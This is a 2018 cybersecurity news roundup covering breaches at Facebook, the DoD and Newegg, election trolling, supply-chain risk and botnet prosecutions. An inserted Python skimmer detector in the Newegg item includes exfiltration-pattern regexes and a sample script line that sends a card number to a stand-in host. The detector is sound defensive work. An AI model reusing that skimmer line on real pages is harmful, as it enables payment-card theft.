Cyber Bolt Cutters in the Supply Chain

A few months ago, the CyberBrief reported on an early 2018 incident where a Chinese hacker managed to get his (or her, or their) way into the servers of a contractor working for the U.S. Naval Undersea Warfare Center and steal nearly a terabyte of data. Yeah, that was a bad day. This, among other more recent incidents, has the government concerned that the cybersecurity industry hasn’t done enough to protect the vulnerable U.S. supply chain. And it’s probably true. According to a recent DoD report, while most cyber research is pretty heavy on things like cloud, data management and other IT services, the supply chain is often overlooked. But, considering the “infinite number of touch points” on a supply chain that can be exploited or corrupted, the time to secure our supply chains is now.

On Oct 4, Bloomberg reported that China had infected multiple U.S.-bound products, including some sold by juggernauts like Amazon and Apple. This allegation has been vigorously denied by all the named companies and by the U.S. Government, but nonetheless the article highlights very clearly how a supply chain attack like this could occur. Jennifer Bisceglie, head of Interos Solutions, asserts that “the average consumer does not really understand that technologies may be sharing information to Russia, China or North Korea.” And that’s a big deal considering that nearly 51 percent of all shipments to the top seven IT suppliers originate in China. So, what can we do about it? Well for starters, we all need to know where our important components are coming from. “Once a business understands who and where they are sourcing from, they might change who they partner with,” added Bisceglie.

Ignorance is bliss. But that bliss could cost us everything.

P.S. – We think Jennifer Bisceglie is pretty cool. In case you missed it, she was a featured speaker at the 2018 NCC Cyber Symposium. Fist bump to Jennifer…

We Need More Women in Cyber

If we haven’t mentioned it yet, October is National Cybersecurity Awareness Month. Cheers!

We think it’s the perfect time to make a case for more women in cybersecurity. In case you didn’t know it, currently women only make up a measly 20% of the cybersecurity workforce. Seriously? We can do better than that! Frankly, we need to do better than that. And it’s not just about bumping up a percentage or simply gender equality. With the massive shortage of 3 million cybersecurity professionals globally today, and the ever-growing threats around us, our industry needs every talented professional we can get – men and women alike. Diversity is a force multiplier and one we dearly need. It’s high time that we fight the misconception that jobs in STEM are really more ideal for men. Instead, we need to lead with the notion that tech and cybersecurity are just as well suited for women as for men.

Speaking of women in cyber, did we mention that we think Jennifer Bisceglie is basically a tech-Jedi? (hint: read the previous article).

Cybersecurity, Social Media & The Elections: Part 1

There’s no doubt that social media has given a voice and a platform for millions of people who may have otherwise been unseen and unheard. While social media companies may (or may not) be altruistic at heart, the same platforms provide the perfect ecosystem for bad actors and motivated political campaigns to use marketing, manipulation and “psychographic targeting” to sway elections. Yeah, we know you’ve heard it before but as the data unfolds from Cambridge Analytica and the like, the picture of technological deception becomes more pervasive than any of us imagined.

Last week, social media giant Twitter published an archive of a whopping 10 million tweets from phony troll accounts sent between 2013 and 2018 (yup…that includes the election year, 2016). The tweets originated from over 3,800 different accounts connected with the Russian Internet Research Agency, and another 770 accounts are said to have originated from Iran. Researchers assert that the Russian trolls use the exact same techniques that drive genuine engagement and activism online. It’s pretty clear that part of our job as the cybersecurity community is to do whatever we can to continue to give a voice to the digitally marginalized, while doubling down on stopping the bad guys and keeping our democracy from being weakened when it matters most.

DoD Hacked

That’s right. Not even the Department of Defense is immune to cyber criminals. According to the Associated Press, a data breach, which exposed personal and credit card information of at least 30K people, was discovered on Oct. 4th but the attack probably happened months earlier. The bad actors gained access via a travel management firm that handles a limited number of the DoD’s travel needs. A DoD spokesman asserts, “The Department is continuing to assess the risk of harm,” and “while additional information about this incident is being gathered, the department is assessing further remedial measures.”

How to Check if Your Facebook Account Was Hacked

Last week, we reported on Facebook’s worst-ever security breach. As many as 30 million users have been affected by the breach and hackers have successfully accessed 29 million of them. Even so, hackers weren’t able to gain access to any third-party app data, something that could have had even more serious consequences. Facebook published a blog post to give more details. Here’s what we know…

For 15 million users, usernames and contact information were compromised. For another 14 million users, additional information was accessed, including education, work, gender, religion, hometown, and more. Private messages, it appears, were not hacked. Still, this is a huge deal for Facebook. If you want to check to see if you are one of the 30 million Facebookers hacked, you can do so by accessing their Help Center.

A Crack In New Eggs Data

If you’ve been following the CyberBrief, then you probably already know about the Ticketmaster and British Airways data breaches that went down earlier this year. Both of those breaches have been pinned on the notorious hacking group called Magecart. Last week, the cyber sleuths at Volexity and RiskIQ uncovered a new hack by Magecart that targeted the popular computer hardware and consumer electronics retailer, Newegg.

The hackers used what’s called a digital credit card skimmer, which is basically a tactic where the hackers gain access to an operating system and then insert a few lines of malicious code that are designed to capture and send sensitive credit card information. The hack occurred between August 14 and Sept 18, 2018. With over 50 million monthly web visitors, this hack is a pretty big deal. Newegg has fixed the problem and recommends that anyone who suspects that their data might have been compromised immediately contact their bank, block their payment card, and request a replacement.
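A defender-side triage check for the skimming pattern described above, added here as an example (not code from Newegg, Volexity or RiskIQ): it parses a checkout page and flags script tags loaded from hosts outside an assumed first-party allowlist, plus inline scripts that both reference payment fields and contain an outbound-send construct. The HTML, hostnames and allowlist are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed first-party hosts for the checkout page (constructed allowlist).
FIRST_PARTY = {"shop.example", "static.shop.example"}
PAYMENT_HINTS = re.compile(r"card|cvv|cvc|expir", re.I)
EXFIL_HINTS = re.compile(r"fetch\(|XMLHttpRequest|sendBeacon|new Image\(", re.I)

class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from a page."""
    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._in_inline, self._buf = False, []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline = True  # body arrives through handle_data (CDATA)

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            if self._in_inline:
                self.inline.append("".join(self._buf))
            self._in_inline, self._buf = False, []

def find_skimmer_indicators(html, allowlist=FIRST_PARTY):
    """Return (indicator, detail) pairs worth a human look; empty means clean."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname  # None for relative paths, i.e. first party
        if host and host not in allowlist:
            findings.append(("unlisted-script-host", host))
    for body in parser.inline:
        if PAYMENT_HINTS.search(body) and EXFIL_HINTS.search(body):
            findings.append(("inline-payment-exfil", body.strip()[:60]))
    return findings

# Constructed checkout page: one legitimate script, one unknown third-party
# script, and an inline stand-in for the injected lines the article describes.
CHECKOUT_HTML = """<form id="pay"><input id="card_number"><input id="cvv"></form>
<script src="https://static.shop.example/checkout.js"></script>
<script src="https://cdn.example-collector.invalid/jquery.min.js"></script>
<script>var n = document.getElementById('card_number').value;
new Image().src = 'https://example-collector.invalid/p?q=' + n;</script>"""
```

Run `find_skimmer_indicators(CHECKOUT_HTML)` to see both indicators fire; a page whose scripts are all first-party and free of payment-field access returns an empty list.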

Facebook Hacked, Again

Remember that Bill Murray movie, Groundhog Day? Yeah, well…that’s Facebook. The world’s biggest social media platform suffered another security breach as a staggering 50 million users were compromised by a sophisticated zero-day exploit that allowed hackers to steal account access. So, if you woke up anxious to check on Grumpy Cat’s (that’s the famous online cat, as if you didn’t know?) status and found yourself locked out of your Facebook account, you definitely weren’t alone. The social media giant admitted that an unknown hacker made away with secret access tokens for a user base as big as the population of Spain. As a security measure, Facebook reset all access tokens for the affected accounts, requiring users to log in to Facebook and any apps that use Facebook for credentials.

Ned? Ned Ryerson! (classic Bill Murray)

Executives Getting Cyber-Strong

Marvel’s Infinity War brought the world’s superheroes together when Thanos, the baddest guy in the universe, threatened to destroy half the population. The same thing happened earlier this week in a room tucked away in the gardens behind the Governor’s Mansion in Denver. Well, sort of. The National Cybersecurity Center hosted 30 top executives from around the country for Cyber For Executives, an intensive, two-day executive cybersecurity training course.

The event was designed to give executive leaders and boards of directors the information and tools they need to understand and address the clear and present dangers of cybercrime. Featuring cyber experts Rick Crandall, Andre McGregor, Paul Rosen and Ray Watson, the event was eye-opening and transformational. If you missed it, don’t worry. The entire Cyber for Executives course was recorded and will be turned into an online course in partnership with Pikes Peak Community College. This is one way the National Cybersecurity Center is making a dent in executive security awareness and raising the bar for bad guys.

Young Hackers Help FBI to Avoid Jail

Three twenty-something hackers were nabbed for creating and spreading the notorious Mirai botnet, a sophisticated piece of IoT malware. Mirai was originally designed to hack the popular video game, Minecraft, but when the source code was released in the wild, it didn’t take long for serious bad actors to get a hold of it and put it to use on much more nefarious hacks. In a Mr. Robot-style twist, rather than face serious jail time, the young hackers agreed to help the FBI investigate and neutralize other complex cybercrime cases. And it worked. The trio were credited, in part, for the 2017 takedown of the dangerous Kelihos botnet. The case of the Mirai Three demonstrates the government’s commitment to “hold criminals accountable while encouraging offenders to choose a different path to apply their skills.”

Russian Hacker Pleads Guilty

Remember the Russian arrested for releasing the infamous Kelihos botnet? Looks like his hacking days are over, at least for a good while. Peter Yuryevich Levashov (one of his many online aliases) has finally pleaded guilty to computer crime, wire fraud, conspiracy and identity theft charges. The 38-year-old has admitted operating some of the most notorious malware botnets, including Storm, Waledac and Kelihos, which together infected over 100,000 computers and generated hundreds of millions of dollars for cybercriminals. Score one for the good guys.